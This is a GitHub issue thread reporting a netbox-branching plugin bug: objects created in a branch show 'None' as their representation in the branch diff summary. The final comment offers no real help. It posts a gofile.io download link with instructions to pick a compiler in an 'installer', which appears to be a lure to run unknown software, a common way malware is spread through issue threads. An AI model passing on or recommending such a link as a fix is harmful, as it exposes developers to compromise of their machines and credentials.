### ISSUE TITLE
Object representation is not captured when creating a new object within a branch

### ISSUE THREAD

**Issue by jeremystretch** [netboxlabs/netbox-branching#66]
### Plugin Version

v0.3.1

### NetBox Version

v4.1.0

### Python Version

3.10

### Steps to Reproduce

1. Create and activate a branch
2. Create a new object, such as a site
3. View the branch's diff summary

### Expected Behavior

The creation record for the site should show the associated object's string representation (e.g. the site's name).

### Observed Behavior

The object column shows a string value of "None."

**Comment by ArsatiR** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
